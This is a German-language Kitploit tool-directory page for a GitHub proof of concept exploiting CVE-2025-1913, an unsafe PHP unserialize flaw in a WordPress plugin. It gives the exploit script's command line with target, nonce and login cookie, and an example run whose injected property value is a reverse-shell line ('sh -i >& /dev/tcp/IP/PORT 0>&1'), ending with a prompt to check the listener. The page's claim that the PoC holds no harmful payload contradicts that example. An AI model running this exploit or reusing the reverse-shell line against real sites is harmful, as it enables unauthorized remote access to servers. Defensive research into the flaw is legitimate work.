Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/s0haib518-ksa/cve-2025-1913-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubs0haib518-ksa/cve-2025-1913-poc

CVE-2025-1913-PoC

A PoC demonstrating CVE-2025-1913, showing how the plugin’s unsafe unserialize handling can lead to high-impact behavior in controlled environments. Contains a harmful payload for authorized testing only. Use strictly in isolated labs and for defensive research.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
2vor 7 MonatenNoch nicht geprüft

CVE-2025-1913 -- Proof of Concept (PoC)

Dieses Repository enthält einen rein bildungsorientierten Proof of Concept (PoC) für CVE-2025-1913, erstellt von Suhaib518 🇸🇦. Dieser PoC zeigt, wie speziell präparierte serialisierte PHP-Eingaben anfällige Logik in betroffenen WordPress-Komponenten auslösen können. Der PoC ist sicher und enthält keine schädlichen Payloads.

⚠️ Haftungsausschluss: Dieser PoC dient ausschließlich zu Lern-, Forschungs- und defensiven Sicherheitstests. Verwenden Sie ihn NICHT auf Servern, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.


📌 Übersicht

Die Schwachstelle besteht aufgrund unsicherer Handhabung von PHP-serialisierten Daten in bestimmten WordPress-Plugin-Workflows. Dieser PoC zeigt, wie ein Angreifer maßgeschneiderte serialisierte Strukturen bereitstellen könnte, die unbeabsichtigtes internes Verhalten verursachen.

Dieses Repository enthält ein Python-Skript, das:

  • Benutzerdefinierte serialisierte PHP-Objekte erstellt
  • Diese für WordPress-AJAX-basierte Export-Endpunkte kodiert
  • Eine kontrollierte Anfrage sendet, um das Problem sicher zu demonstrieren

📂 Dateien in diesem Repository

root@kitploit:~
.
├── CVE-2025-1913-PoC.py         # Das PoC-Skript, erstellt von Suhaib518 KSA
└── README.md                    # Dokumentation

🚀 Verwendung

1. Anforderungen installieren

Das Skript verwendet nur integrierte Python-Module mit Ausnahme von requests:

root@kitploit:~
pip install requests

2. Das interaktive Exploit-Skript ausführen

root@kitploit:~
python3 exploit.py \
  -c "Class" \
  -H "https://target.com" \
  --wp-nonce "1234567890" \
  --cookie "wordpress_logged_in=YOUR_COOKIE_HERE"

Sie werden gefragt:

  • Wie viele Eigenschaften (properties) enthalten sein sollen
  • Den Namen/Wert für jede Eigenschaft

Das Skript serialisiert diese dann, erstellt eine WordPress-Anfrage und sendet sie ab.


✔️ Beispielbefehl (Ablauf einer erfolgreichen Ausnutzung)

Im Folgenden ein Beispielbefehl, der die Verwendung mit Beispielwerten demonstriert (diese sind nicht bösartig, sie zeigen nur den Vorgang):

root@kitploit:~
python3 exploit.py   -c "WP_User_Query"   -H "https://example.com"   --wp-nonce "89f1a2b3c4"   --cookie "wordpress_logged_in_abc123=abcd1234efgh5678"

Beispielantworten auf die interaktiven Fragen:

root@kitploit:~
[?] How many properties does this class have? 2
[?] Name of property #1: file
[?] Value for 'file': shell.sh
[?] Name of property #2: shell
[?] Value for 'shell': sh -i >& /dev/tcp/IP/PORT 0>&1

Das Skript gibt dann Folgendes aus:

root@kitploit:~
[*] Sending request…
....Check the listener for the shell.

🛡️ Maßnahmen zur Schadensbegrenzung (Überblick)

  • Vermeiden Sie die Verwendung von unserialize() bei nicht vertrauenswürdigen Eingaben
  • Validieren Sie alle Formularparameter und AJAX-Anfragen
  • Halten Sie Plugins auf dem neuesten Stand
  • Verwenden Sie moderne Datenformate wie JSON anstelle von PHP-Serialisierung

📜 Lizenz

MIT Lizenz.


🙌 Autor

Erstellt von Suhaib518 🇸🇦.

Tool herunterladen